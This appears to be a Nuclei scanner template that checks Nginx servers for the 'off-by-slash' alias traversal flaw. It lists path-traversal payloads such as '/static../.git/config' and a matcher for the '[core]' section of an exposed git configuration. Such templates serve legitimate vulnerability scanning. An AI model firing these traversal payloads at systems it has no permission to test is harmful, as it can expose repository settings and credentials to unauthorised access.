42 lines
1.3 KiB
YAML
42 lines
1.3 KiB
YAML
id: git-config-nginxoffbyslash
|
|
|
|
info:
|
|
name: Nginx - Git Configuration Exposure
|
|
author: organiccrap
|
|
severity: medium
|
|
description: Nginx is vulnerable to git configuration exposure.
|
|
reference:
|
|
- https://beaglesecurity.com/blog/vulnerability/nginx-off-by-slash-exposes-git-config.html
|
|
- https://twitter.com/Random_Robbie/status/1262676628167110656
|
|
- https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cwe-id: CWE-200
|
|
metadata:
|
|
max-request: 10
|
|
tags: config,exposure,nginx
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}{{paths}}"
|
|
payloads:
|
|
paths:
|
|
- '/static../.git/config'
|
|
- '/js../.git/config'
|
|
- '/images../.git/config'
|
|
- '/img../.git/config'
|
|
- '/css../.git/config'
|
|
- '/assets../.git/config'
|
|
- '/content../.git/config'
|
|
- '/events../.git/config'
|
|
- '/media../.git/config'
|
|
- '/lib../.git/config'
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '[core]'
|
|
# digest: 490a004630440220428f7cb6e63a587930ea6412a94e5d322bbcbf4fc3a7f451c42dca4e455b0b88022067e5bcc7186dcdb733480c25d911a719caa8535f0232ad7c57a00b82c0fb81b6:922c64590222798bb761d5b6d8e72950 |